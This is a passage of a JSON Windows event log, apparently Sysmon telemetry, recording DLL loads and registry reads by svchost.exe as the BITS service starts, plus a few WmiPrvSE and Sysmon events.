- "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "wldp.dll", - "image_path": "C:\\Windows\\System32\\wldp.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "crypt32.dll", - "image_path": "C:\\Windows\\System32\\crypt32.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "msasn1.dll", - "image_path": "C:\\Windows\\System32\\msasn1.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "wintrust.dll", - "image_path": "C:\\Windows\\System32\\wintrust.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_value": "BITS", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS\\PerfMMFileName", - "registry_value": "PerfMMFileName", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_value": "BITS", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", - "registry_value": "BITS", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - 
"event_type": "image_load", - "image_name": "FlightSettings.dll", - "image_path": "C:\\Windows\\System32\\FlightSettings.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "cryptsp.dll", - "image_path": "C:\\Windows\\System32\\cryptsp.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "bcd.dll", - "image_path": "C:\\Windows\\System32\\bcd.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "winhttp.dll", - "image_path": "C:\\Windows\\System32\\winhttp.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "policymanager.dll", - 
"image_path": "C:\\Windows\\System32\\policymanager.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "msvcp110_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp110_win.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "netprofm.dll", - "image_path": "C:\\Windows\\System32\\netprofm.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "npmproxy.dll", - "image_path": "C:\\Windows\\System32\\npmproxy.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "bitsigd.dll", - "image_path": "C:\\Windows\\System32\\bitsigd.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457140000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "upnp.dll", - "image_path": "C:\\Windows\\System32\\upnp.dll", - "pid": 6868, 
- "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457140000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "ssdpapi.dll", - "image_path": "C:\\Windows\\System32\\ssdpapi.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "urlmon.dll", - "image_path": "C:\\Windows\\System32\\urlmon.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "iertutil.dll", - "image_path": "C:\\Windows\\System32\\iertutil.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": 
"C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\System32\\cryptbase.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "sxs.dll", - "image_path": "C:\\Windows\\System32\\sxs.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_value": "BITS", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", - "registry_value": "BITS", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "AppXDeploymentClient.dll", - "image_path": 
"C:\\Windows\\System32\\AppXDeploymentClient.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "StateRepository.Core.dll", - "image_path": "C:\\Windows\\System32\\StateRepository.Core.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\BITS", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\BITS\\Start", - "registry_value": "Start", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "image_load", - "image_name": "Windows.Storage.OneCore.dll", - "image_path": "C:\\Windows\\System32\\Windows.Storage.OneCore.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "WsmAuto.dll", - "image_path": "C:\\Windows\\System32\\WsmAuto.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "miutils.dll", - "image_path": "C:\\Windows\\System32\\miutils.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, 
- { - "event_type": "image_load", - "image_name": "WsmSvc.dll", - "image_path": "C:\\Windows\\System32\\WsmSvc.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "dsrole.dll", - "image_path": "C:\\Windows\\System32\\dsrole.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "pcwum.dll", - "image_path": "C:\\Windows\\System32\\pcwum.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "mi.dll", - "image_path": "C:\\Windows\\System32\\mi.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "userenv.dll", - "image_path": "C:\\Windows\\System32\\userenv.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "gpapi.dll", - "image_path": "C:\\Windows\\System32\\gpapi.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "wkscli.dll", - "image_path": 
"C:\\Windows\\System32\\wkscli.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "OnDemandConnRouteHelper.dll", - "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883573458080000, - "unique_pid": 
"{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "webio.dll", - "image_path": "C:\\Windows\\System32\\webio.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "dnsapi.dll", - "image_path": "C:\\Windows\\System32\\dnsapi.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573458230000, - 
"unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "FWPUCLNT.DLL", - "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458230000, 
- "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "rasadhlp.dll", - "image_path": "C:\\Windows\\System32\\rasadhlp.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "usermgrcli.dll", - "image_path": "C:\\Windows\\System32\\usermgrcli.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "ExecModelClient.dll", - "image_path": "C:\\Windows\\System32\\ExecModelClient.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "CoreMessaging.dll", - "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "twinapi.appcore.dll", - "image_path": "C:\\Windows\\System32\\twinapi.appcore.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573478860000, - "unique_pid": 
"{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "rmclient.dll", - "image_path": "C:\\Windows\\System32\\rmclient.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "coml2.dll", - "image_path": "C:\\Windows\\System32\\coml2.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "OneCoreCommonProxyStub.dll", - "image_path": "C:\\Windows\\System32\\OneCoreCommonProxyStub.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "execmodelproxy.dll", - "image_path": "C:\\Windows\\System32\\execmodelproxy.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_value": "BITS", 
- "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", - "registry_value": "BITS", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "ResourcePolicyClient.dll", - "image_path": "C:\\Windows\\System32\\ResourcePolicyClient.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573479009984, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "vssapi.dll", - "image_path": "C:\\Windows\\System32\\vssapi.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573479009984, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "vsstrace.dll", - "image_path": "C:\\Windows\\System32\\vsstrace.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573479009984, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "samcli.dll", - "image_path": "C:\\Windows\\System32\\samcli.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573479009984, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "samlib.dll", - "image_path": "C:\\Windows\\System32\\samlib.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": 
"C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573479009984, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "es.dll", - "image_path": "C:\\Windows\\System32\\es.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573479009984, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "BitsProxy.dll", - "image_path": "C:\\Windows\\System32\\BitsProxy.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573479330000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "BitsProxy.dll", - "image_path": "C:\\Windows\\System32\\BitsProxy.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479330000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573479330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" 